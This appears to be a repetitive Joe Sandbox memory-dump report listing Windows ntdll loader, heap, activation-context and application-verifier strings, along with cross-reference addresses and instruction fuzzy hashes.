                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                      • API String ID: 0-1700792311
                                                                                                      Strings
                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01208A67
                                                                                                      • VerifierDebug, xrefs: 01208CA5
                                                                                                      • VerifierDlls, xrefs: 01208CBD
                                                                                                      • HandleTraces, xrefs: 01208C8F
                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01208A3D
                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01208B8F
                                                                                                      • VerifierFlags, xrefs: 01208C50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                      • API String ID: 0-3223716464
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                      • API String ID: 0-1109411897
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-792281065
                                                                                                      Strings
                                                                                                      • LdrpInitShimEngine, xrefs: 011D99F4, 011D9A07, 011D9A30
                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011D9A2A
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011D9A11, 011D9A3A
                                                                                                      • apphelp.dll, xrefs: 01176496
                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011D99ED
                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011D9A01
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-204845295
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011F219F
                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 011F2160, 011F219A, 011F21BA
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011F2178
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011F2165
                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011F2180
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011F21BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                      • API String ID: 0-861424205
                                                                                                      Strings
                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011F81E5
                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 011F8170
                                                                                                      • LdrpInitializeImportRedirection, xrefs: 011F8177, 011F81EB
                                                                                                      • LdrpInitializeProcess, xrefs: 011BC6C4
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011BC6C3
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 011F8181, 011F81F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-475462383
                                                                                                      APIs
                                                                                                        • Part of subcall function 011C2DF0: LdrInitializeThunk.NTDLL ref: 011C2DFA
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BA3
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BB6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D60
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404860816-0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                      • API String ID: 0-379654539
                                                                                                      Strings
                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011B855E
                                                                                                      • LdrpInitializeProcess, xrefs: 011B8422
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011B8421
                                                                                                      • @, xrefs: 011B8591
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1918872054
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011F22B6
                                                                                                      • .Local, xrefs: 011B28D8
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011F21DE
                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011F21D9, 011F22B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                      • API String ID: 0-1239276146
                                                                                                      Strings
                                                                                                      • RtlDeactivateActivationContext, xrefs: 011F3425, 011F3432, 011F3451
                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011F3456
                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011F342A
                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011F3437
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                      • API String ID: 0-1245972979
                                                                                                      Strings
                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011E1028
                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011E106B
                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011E10AE
                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011E0FE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011F3640, 011F366C
                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 011F365C
                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F362F
                                                                                                      • LdrpFindDllActivationContext, xrefs: 011F3636, 011F3662
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                      Strings
                                                                                                      • LdrpDynamicShimModule, xrefs: 011EA998
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011EA9A2
                                                                                                      • apphelp.dll, xrefs: 011A2462
                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011EA992
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      Strings
                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0119327D
                                                                                                      • HEAP: , xrefs: 01193264
                                                                                                      • HEAP[%wZ]: , xrefs: 01193255
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: $@
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011EA121
                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 011EA10F
                                                                                                      • LdrpCheckModule, xrefs: 011EA117
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011F82E8
                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011F82DE
                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011F82D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                      Strings
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0123C1C5
                                                                                                      • @, xrefs: 0123C1F1
                                                                                                      • PreferredUILanguages, xrefs: 0123C212
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                      Strings
                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01204888
                                                                                                      • LdrpCheckRedirection, xrefs: 0120488F
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01204899
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-2558761708
                                                                                                      Strings
                                                                                                      • LdrpInitializationFailure, xrefs: 012020FA
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01202104
                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 012020F3
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2986994758
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: #%u
                                                                                                      • API String ID: 48624451-232158463
                                                                                                      Strings
                                                                                                      • LdrResSearchResource Enter, xrefs: 0118AA13
                                                                                                      • LdrResSearchResource Exit, xrefs: 0118AA25
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                      • API String ID: 0-4066393604
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `$`
                                                                                                      • API String ID: 0-197956300
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Legacy$UEFI
                                                                                                      • API String ID: 2994545307-634100481
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$MUI
                                                                                                      • API String ID: 0-17815947
                                                                                                      Strings
                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0118063D
                                                                                                      • kLsE, xrefs: 01180540
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                      • API String ID: 0-2547482624
                                                                                                      Strings
                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0118A309
                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0118A2FB
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                      • API String ID: 0-2876891731
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: MUI
                                                                                                      • API String ID: 0-1339004836
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: GlobalTags
                                                                                                      • API String ID: 0-1106856819
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .mui
                                                                                                      • API String ID: 0-1199573805
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: EXT-
                                                                                                      • API String ID: 0-1948896318
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryHash
                                                                                                      • API String ID: 0-2202222882
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #
                                                                                                      • API String ID: 0-1885708031
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: BinaryName
                                                                                                      • API String ID: 0-215506332
                                                                                                      Strings
                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0120895E
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                      • API String ID: 0-702105204
                                                                                                      • Instruction ID: fcfe4efbcfe4763351556c45aea30a6dcce3455575796896bf84f7bc4babfd95
                                                                                                      • Opcode Fuzzy Hash: 7d17972ff7e8559fcd07f64f13bd1771b65e0585672bfa9326252df8b61b23df
                                                                                                      • Instruction Fuzzy Hash: 80A10235E01A1A9FEB2DDBA8C848FAEBFF4AB04714F150125EE11AB281D7749D41CBD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 40d7be8f2d56042a6c791c042b1412af80f6fcec2d46a9f61fa3ab1bf5e686b4
                                                                                                      • Instruction ID: 8c5aadb93247660acdfc09aaa4ef2d4a869be20f8a86668b635f76ba00313ccd
                                                                                                      • Opcode Fuzzy Hash: 40d7be8f2d56042a6c791c042b1412af80f6fcec2d46a9f61fa3ab1bf5e686b4
                                                                                                      • Instruction Fuzzy Hash: CFA1A174B0061ADFDB2DDF69C590BAAB7B5FF68B18F10402DFA0597281DB34A811CB50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e5af30fdb7a639e312fc9a6d6fde10ba41b98c992b4af1094fae707f93d35138
                                                                                                      • Instruction ID: d3316b62c85276fd22b95ff7642f19518ff06def7bd2ca1f3790bf1a7ff2c846
                                                                                                      • Opcode Fuzzy Hash: e5af30fdb7a639e312fc9a6d6fde10ba41b98c992b4af1094fae707f93d35138
                                                                                                      • Instruction Fuzzy Hash: F4A1F172624682EFD759EF18C980B5ABBE9FF58708F04052CEA49DB650E334ED40CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 39701751158e6599aeaac70475110c6ec3b1961e7d3b9cec4d3ccb0f1e4eb450
                                                                                                      • Instruction ID: b8ae8ccac0c4750bf065d2e74e1ab84da0cf14ff6c7a40f58e2cbb30e7822efa
                                                                                                      • Opcode Fuzzy Hash: 39701751158e6599aeaac70475110c6ec3b1961e7d3b9cec4d3ccb0f1e4eb450
                                                                                                      • Instruction Fuzzy Hash: 55919471D10216AFDF16CFA8D884BBEBFB5AF48710F154269E610EB382D774D9109BA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef7d5b2617ce98d99285892151cf52609b319b56343f8dc3100b3578977050aa
                                                                                                      • Instruction ID: 21f7b8bfbf229eece4f5c5897be87217366fe34e3da975b334c5475ce60e8b59
                                                                                                      • Opcode Fuzzy Hash: ef7d5b2617ce98d99285892151cf52609b319b56343f8dc3100b3578977050aa
                                                                                                      • Instruction Fuzzy Hash: EF913235A01A1ADBEF2CDB68C444BBE7BE1EF94718F054065E925DB380E734D841CB52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 88954d87489e9b3f568676d3b3b3df2a4384907cb9c072f357b555a2cae40dda
                                                                                                      • Instruction ID: d343f3de82ca3402792300bcb969f07d5a63bf4661b27745836289bcf220f1ac
                                                                                                      • Opcode Fuzzy Hash: 88954d87489e9b3f568676d3b3b3df2a4384907cb9c072f357b555a2cae40dda
                                                                                                      • Instruction Fuzzy Hash: 96819371A006169FDB1CCF69D950ABEBBF9FB58700F04852EE455E7640E334E941CBA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                      • Instruction ID: ad562c85208363428785d4ec3fa226793a300dd167c0353ac996ab95dd73a064
                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                      • Instruction Fuzzy Hash: 6181A131A2020A9FDF1DCF98C481AAEBBF6FF98310F188569D9169B385D774E901CB44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ec08183bb8fe972eb435e65905cfba8845c6f85375801e5656e46f1dbf8616df
                                                                                                      • Instruction ID: 222d96c29c1cbaf0f50fa9057465fe6ede2ca37915849e0bd9f25d693b868a4b
                                                                                                      • Opcode Fuzzy Hash: ec08183bb8fe972eb435e65905cfba8845c6f85375801e5656e46f1dbf8616df
                                                                                                      • Instruction Fuzzy Hash: B171B07160475AABDB2DCF29C980B6FB7E4FB48358F05492AEA55D7200E730E944CBD2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e6917d9943997a62345696849bef2a952bf886b983c578a1b9ef950bf021ee9f
                                                                                                      • Instruction ID: eb7ed6f6ad622e90b9468b5e412ad84d334dbdcd7f22588081325826307964e6
                                                                                                      • Opcode Fuzzy Hash: e6917d9943997a62345696849bef2a952bf886b983c578a1b9ef950bf021ee9f
